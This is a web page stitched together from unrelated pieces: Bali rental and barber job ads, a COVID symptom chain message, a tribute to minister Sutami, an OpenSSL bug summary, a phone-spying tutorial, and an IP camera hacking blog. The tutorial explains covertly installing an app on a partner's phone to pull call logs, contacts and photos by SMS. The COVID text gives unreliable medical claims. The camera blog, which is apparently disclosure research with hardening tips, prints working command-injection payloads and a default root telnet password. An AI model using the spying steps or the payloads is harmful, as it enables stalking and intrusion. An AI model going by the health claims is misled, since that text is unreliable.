BALI's one of the best VVIP Luxury Vacation Rentals such as Transportations, Luxury Cars, Luxury Property, Luxury Villas, Luxury Hotel Resort, VIP escort, Friendly, Safe, Reliable, Top Class, Prompt, Polite, 38 years of travelling services. Boudoir Photographer, Film Producer, Event Organizer, Cargo Shipping Agent.
Call Sastra Bali Luxury
+62-81-2939-12345
Teman-teman, kami Keluarga Besar #BodyLab #Bali membuka #Lowongan bagi Anda yang sudah #Senior dan tentunya #Proffessional dalam berkarya di Bisnis Rintisan Terbaru kami dalam Pengembangan Kecantikan dan Estetika Tubuh. Terbuka untuk Tenaga Ahli Lokal, Domestik, Luar Bali serta kandidat dari Expatriate.
Memperkenalkan :
#BeautyLab_Bali dan #BarberLab_Bali
Berlokasi strategis di pusat Desa Wisata Seminyak dan Kerobokan.
Kami membutuhkan Anda para Senior Ahli dan Berbakat dalam :
2 Kandidat Barber (Seni Penata Rambut), dan
2 Receptionists 🙏❤️😀
Boleh WhatsApp Profile Diri Anda kepada Sastra https://wa.me/6281293912345
Jangan lupa beritahu kami tentang Kenapa Anda Adalah Kandidat Barber atau Receptionist terbaik untuk Perusahaan Bintang Lima kami ?
❤️❤️❤️❤️
Body Lab Bali is opening new premium barber branch called Barber Lab. Will be open in the end of October, therefore we are looking for: Senior Barber
Requirements :
- Minimum 5 years experience
- Cutting and shaving skill is a must
- Able to train and help improving skills of our barber team
- Both Indonesian or Foreigner are acceptable
Please send your CV to Barberlab.bali@gmail.com
https://youtu.be/3lj33ygMxMQ
We are at Jalan Raya Kerobokan 86A
🙏❤️ We Love You ❤️🙏
🙏🎉🙏❤️
Terima kasih, tetap jaga kesehatan dengan protokol standar kesehatan bebas Covid-19 dan ...
Waspada covid19, jangan tunggu timbulnya demam tinggi dan banyak batuk, baru berpikir ! Terlambat sudah !
Kenali lebih awal mulai hari ke1 masuknya virus ke dalam tubuh, agar parahnya sakit bisa dicegah. Gejala demam tinggi baru muncul di hari ke 8, dimana virus sudah berhasil berkembang, merusak dan merasuk luas di dalam tubuh. Tingkatkan daya tahan tubuh sebelum virus berhasil menghancurkan kita.
Perhatikan keadaan diri kita sejak kemungkinan mulai terpapar, yaitu sebagai berikut :
Hari ke 1- 3 :
• Hanya seperti masuk angin ringan.
• Makan minum masih normal.
• Tenggorokan hanya sedikit sakit.
Hari ke 4 :
• Sakit kepala ringan.
• Badan sedikit anget, sekitar 36.5°C.
• Sakit tenggorokan ringan.
• Suara mulai serak.
• Selera makan mulai terganggu.
• Indera Perasa/Pengecap "hilang"
• Indera penciuman juga menghilang.
• Sedikit diare ringan.
Hari ke 5 :
• Sakit tenggorokan.
• Suara serak.
• Badan mulai terasa meriang.
• Temperatur sekitar 36.5 - 36.7 °C.
• Badan terasa lelah, cape, sakit.
• Jari² dan persendian terasa sakit.
Hari ke 6 :
• Mulai demam ringan sekitar 37°C.
• Batuk kering atau sedikit berlendir.
• Sesekali terasa susah bernapas.
• Sakit Tenggorokan ketika bicara.
• Sakit waktu makan dan menelan.
• Mual dan mungkin muntah.
• Ada diare.
Hari ke 7 :
• Demam agak tinggi 37.4 - 37.8 °C.
• Batuk lebih banyak dan berdahak.
• Napas pendek² dan tetap.
• Kepala sakit kepala dan berat.
• Nyeri² seluruh tubuh.
• Diare bertambah.
Hari ke 8 :
• Demam tinggi 38°C atau lebih.
• Sulit bernapas, dada terasa berat.
• Sakit kepala, punggung dan sendi².
• Batuk terus menerus.
• Sulit berbicara, seperti bisu.
Hari ke 9 :
• Semua gejala tidak berubah.
• Batuk bertambah parah.
• Demam tak menentu, tak teratur.
• Napas bertambah Sulit.
• Pencegahan sudah tak mungkin.
• Harus segera ditolong intensif.
Bila waspada di hari ke 1-3 tingkatkan daya tahan tubuh, minum vitamin² C, D, E serta sedia panadol (parasetamol), mungkin penyakit ini dapat dihalau untuk berakhir sebelum parah dan kesembuhan boleh didapatkan.
Gejala hari ke 1-3 sangat² ringan dan sering terabaikan tak terdeteksi.
Mungkin hari ke 4 baru mulai curiga. Cepat isolasi mandiri, banyak minum air hangat atau jamu²an juga boleh. Berjemur diri, banyak cuci tangan, cuci muka, ganti baju. Makan makanan yg bergizi dan minum vitamin².
Selamat bersikap dan waspada. Tetap tenang namun bijak. Hindari kemungkinan terpapar sebisa mungkin. Semoga berhasil “berperang” melawan covid dan semoga kita tetap sehat.
*Harap Perhatikan Perbedaannya !!!* (Supaya tidak berprasangka buruk)
1. Batuk kering + Bersin = Polusi udara.
2. Batuk + Lendir + Bersin + Pilek = Pilek biasa.
3. Batuk + Lendir + Bersin + Pilek + Sakit tubuh + Kelemahan + Demam ringan = Flu.
4. Batuk kering + Bersin + Nyeri tubuh + Kelemahan + Demam tinggi + Kesulitan bernapas + Hilangnya indra pengecap dan perasa = Corona virus.
Meninggalnya tiga pasien Corona warga Banyumas, Jawa Tengah, yang mengalami gejala Happy Hypoxia, dinilai mengkhawatirkan.
Pasalnya, gejala ini masih tergolong baru bagi penderita Covid-19.
Tanpa demam, batuk, flu, atau gejala umum layaknya pasien Covid -19 pada umumnya, tiga warga Banyumas yang terinfeksi Corona ini meninggal secara mendadak.
Setelah di periksa ketiganya diketahui mengalami gejala Happy Hypoxia, atau penurunan kadar oksigen.
Happy Hypoxia, gejala baru yang kini ditemukan dibeberapa pasien Covid -19.
Pihak rumah sakit baru menemukan pasien dengan gejala ini, setelah dilakukan pemeriksaan saturasi oksigen dengan alat pulse oxymeter.
Jika pada kondisi normal, kadar oksigen dalam darah adalah 95 sampai 100 persen.
Namun pada penderita dengan gejala happy hypoxia, kadar oksigennya bisa turun sampai dibawah 50 persen.
Gejala ini sering menipu.
Karena pasien masih terlihat baik-baik saja, dan masih dapat beraktivitas.
Nama aslinya Ir. Sutami, beliau adalah Menteri Pekerjaan Umum yang menjabat selama 4 kabinet sejak tahun 1965 hingga tahun 1978.
Karena kemampuan & kejujurannya, Sutami dipercaya di era Presiden Sukarno maupun Presiden Suharto. Selama menjadi Menteri, Sutami memimpin berbagai mega proyek besar dengan dana yang luar biasa. Meski demikian Pria kelahiran Surakarta, Jawa Tengah 19 Oktober 1928 tidak lantas memanfaatkan dana proyek proyek tersebut untuk korupsi dan memperkaya diri.
Dibawah pengawasannya, proyek raksasa seperti:
1. Gedung DPR RI
2. Jembatan Semanggi
3. Waduk Jatiluhur
4. Bandara Ngurah Rai.
5. Jembatan Musi Palembang
6. Jalan Tol Pertama di Indonesia ( Tol Jagorawi)
Semua karyanya hingga kini masih berdiri kokoh.
Sutami adalah satu satunya menteri yang paling miskin di Indonesia bahkan mungkin sampai hari kiamat nanti, karena Sutami adalah manusia yang langka, berpengetahuan, Jujur dan Amanah.
Jika hari lebaran tiba,
para tamu pun bersilaturahmi.
Namun betapa terkejutnya mereka saat menginjakkan kaki di rumah Menteri Sutami. Bukan kemewahan yang ada, namun rumah sederhana yang atapnya bocor di mana-mana.
Bahkan suatu ketika PLN mencabut listrik dirumahnya karena Sutami telat bayar listrik.
Padahal sebagai pejabat negara yang menangani proyek-proyek besar, Menteri Sutami bisa saja hidup bergelimang kemewahan.
Rumahnya beralamat di Jl. Imam Bonjol, Jakarta. Beliau membeli rumah secara mencicil dan baru lunas menjelang pensiun. Tak pernah ia menggunakan fasilitas negara di luar pekerjaannya. Saat pensiun, semua ia kembalikan, termasuk mobil dinasnya.
Semoga Allah lapangkan kuburnya, ringankan pertanggung jawabannya...
Jadikan Sutami Menteri Miskin di dunia tapi Kaya raya di akhiratnya...
OpenSSL 1.0.2a fix several security issues, one of them let crash TLSv1.2 based services remotelly from internet.
Regarding to the TLSv1.2 RFC, this version of TLS provides a "signature_algorithms" extension for the client_hello.
Data Structures
If a bad signature is sent after the renegotiation, the structure will be corrupted, becouse structure pointer: s->c->shared_sigalgs will be NULL, and the number of algorithms: s->c->shared_sigalgslen will not be zeroed. Which will be interpreted as one algorithm to process, but the pointer points to 0x00 address.
Then tls1_process_sigalgs() will try to process one signature algorithm (becouse of shared_sigalgslen=1) then sigptr will be pointer to c->shared_sigalgs (NULL) and then will try to derreference sigptr->rhash.
This mean a Segmentation Fault in tls1_process_sigalgs() function, and called by tls1_set_server_sigalgs() with is called from ssl3_client_hello() as the stack trace shows.
StackTrace
The following code, points sigptr to null and try to read sigptr->rsign, which is assembled as movzbl eax, byte ptr [0x0+R12] note in register window that R12 is 0x00
Debugger in the crash point.
radare2 static decompiled
The patch fix the vulnerability zeroing the sigalgslen. Get David A. Ramos' proof of concept exploit here
Hello Everyone, Today I am Going To Write a very interesting post for You ..hope you all find this valuable.. : What is The cost to hire a spy who can able to spy your girlfriend 24X7 days..???? it's around hundreds of dollars Or Sometimes Even Thousands of dollars
But you are on Hacking-News & Tutorials so everything mentioned here is absolutely free. would you be happy if I will show you a Secret Mobile Phone trick by which you can Spy and trace your girlfriend, spouse or anyone's mobile phone 24 X 7 which is absolutely free?The only thing you have to do is send an SMS like SENDCALLLOG To get the call history of your girlfriend's phone.isn't it Sounds Cool...
Without Taking Much Of Your Time… let's Start The trick…
STEP 1: First of all go to android market from your Girlfriend, spouse, friends or anyone's phone which you want to spy or download the app mentioned below.
STEP 2: Search for an android application named "Touch My life "
STEP 3: download and install that application on that phone.
STEP 4: Trick is Over
Now you can able to spy that phone anytime by just sending SMS to that phone.
Now give back that phone to your girlfriend. and whenever you want to spy your girlfriend just send SMS from your phone to your Girlfriend phone Which are mentioned in Touch My Life manage to book.
1) Write "CALL ME BACK" without Quotes and Send it to your girlfriend's mobile number for an Automatic call back from your girlfriend's phone to your phone.
2)Write "VIBRATENSEC 30" without Quotes and send it to your girlfriend's mobile number to Vibrate your Girlfriend's Phone for 30 seconds.You can also change Values from 30 to anything for the desired Vibrate time.
3)Write "DEFRINGTONE" without Quotes and Send it to your girlfriend's mobile number..this will play the default ringtone on your girlfriend's phone.
4)Write "SEND PHOTO youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number.it will take the photo of the current location of your girlfriend and send it to the email address specified in the SMS as an attachment.it will also send a confirmation message to your number.
5)Write "SENDCALLLOG youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the call details like incoming calls, outgoing calls, missed calls to the email address specified in the SMS.
6)Write "SENDCONTACTLIST youremail@gmail.com" without Quotes and Send it to your girlfriend's mobile number ..it will send all the Contact list to the email address specified in the SMS.
So Guys Above all are only some Handy features of touch my life…You can also view more by going to touch my life application and then its manage rules...
The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the most affordable among all others, my expectations regarding security was low. But this camera was still able to surprise me.
Maybe I will disclose the camera model used in my hack in this blog later, but first, I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem because they share being developed on the same SDK. Again, my expectations are low on this.
The obvious problems
I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.
It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course.
Sniffing the traffic between the camera and the desktop application it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in
This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong - user.ipcam.hk/user.easyn.hk - and China - op2.easyn.cn/op3.easyn.cn. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud, the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.
Let's run a quick nmap on this device.
PORT STATE SERVICE VERSION 23/tcp open telnet BusyBox telnetd 81/tcp open http GoAhead-Webs httpd | http-auth: | HTTP/1.1 401 Unauthorized |_ Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81 |_http-methods: No Allow or Public header in OPTIONS response (status code 400) |_http-title: Document Error: Unauthorized 8600/tcp open tcpwrapped
The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27-page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.
The double-blind command injection
The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately, it was not working at all, I got an invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems that made the exploitation harder. I call this vulnerability double-blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleep was not a real solution.
But the third problem was the worst. It was limited to 32 characters. I was able to leak some information via DNS, like with the following commands I was able to see the current directory:
$(ping%20-c%202%20%60pwd%60)
or cleaning up after URL decode:
$(ping -c 2 `pwd`)
but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.
The following are some examples of my desperate trying to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
$(cp /etc/passwd /tmp/a) ;copy /etc/passwd to a file which has a shorter name $(cat /tmp/a|head -1>/tmp/b) ;filter for the first row $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters $(ping `cat /tmp/c`) ;leak it via DNS
After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...
I also tried commix, as it looked promising on Youtube. Think commix like sqlmap, but for command injection. But this double-blind hack was a bit too much for this automated tool, unfortunately.
But after spending way too much time without progress, I finally found the password to Open Sesame.
$(echo 'root:passwd'|chpasswd)
Now, logging in via telnet
(none) login: root Password:
BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. #
Woot woot :) I quickly noticed the root of the command injection problem:
# cat /tmp/ftpupdate.sh /system/system/bin/ftp -n<<! open ftp.site.com 21 user ftpuser $(echo 'root:passwd'|chpasswd) binary mkdir PSD-111111-REDACT cd PSD-111111-REDACT lcd /tmp put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg close bye
Whenever a command is put into the FTP password field, it is copied into this script, and after the script is scheduled, it is interpreted by the shell as commands. After this I started to panic that I forgot to save the content of the /etc/passwd file, so how am I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password.
root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh
Unfortunately, there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.
It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456, there is no GUI to change this password, and changing it via console, it only lasts until the next reboot. I think it is safe to tell this a backdoor.
With this console access we can access the password for the FTP server, for the SMTP server (for alerts), the WiFi password (although we probably already have it), access the regular admin interface for the camera, or just modify the camera as we want. In most deployments, luckily this telnet port is behind NAT or firewall, so not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the Telnet port to be open to the Internet, only the camera HTTP port 81. You know, the one protected with the 4 character numeric password by default.
Last but not least everything is running as root, which is not surprising.
My hardening list
I added these lines to the end of /system/init/ipcam.sh:
Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.
If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line into the beginning of /system/init/ipcam.sh
iptables -A OUTPUT -p udp ! --dport 53 -j DROP
You can use OpenVPN to connect into your home network and access the web interface of the camera. It works from Android, iOS, and any desktop OS.
My TODO list
Investigate the script /system/system/bin/gmail_thread
Investigate the cloud protocol * - see update 2016 10 27
Buy a Raspberry Pie, integrate with a good USB camera, and watch this IP camera to burn
A quick googling revealed I am not the first finding this telnet backdoor account in IP cameras, although others found it via JTAG firmware dump.
And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.
When in the next episode of Mr. Robot, you see someone logging into an IP camera via telnet with root:123456, you will know, it is the sad reality.
If you are interested in generic ways to protect your home against IoT, read my previous blog post on this.
Update: as you can see in the following screenshot, the bad guys already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html
Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs.
Update 2016 10 27: As I already mentioned this at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port-forward/UPNP on your router, the cloud protocol still allows anyone to connect to the camera if the attacker knows the (brute-forceable) camera ID. Although this is the user-interface only, now the attacker can use the command injection to execute code with root privileges. Or just grab the camera configuration, with WiFi, FTP, SMTP passwords included. Youtube video : https://www.youtube.com/watch?v=18_zTjsngD8 Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk
Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a massive list of cameras (especially the InfoLeak and the RCE), which allow us to execute root commands against 1250+ camera models with a pre-auth vulnerability. "https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt
Update 2017-05-11: CVE-2017-5674 (see above), and my command injection exploit was combined in the Persirai botnet. 120 000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously." This issue might be worse than the Mirai worm because these effects cameras and other IoT behind NAT where UPnP was enabled. http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/
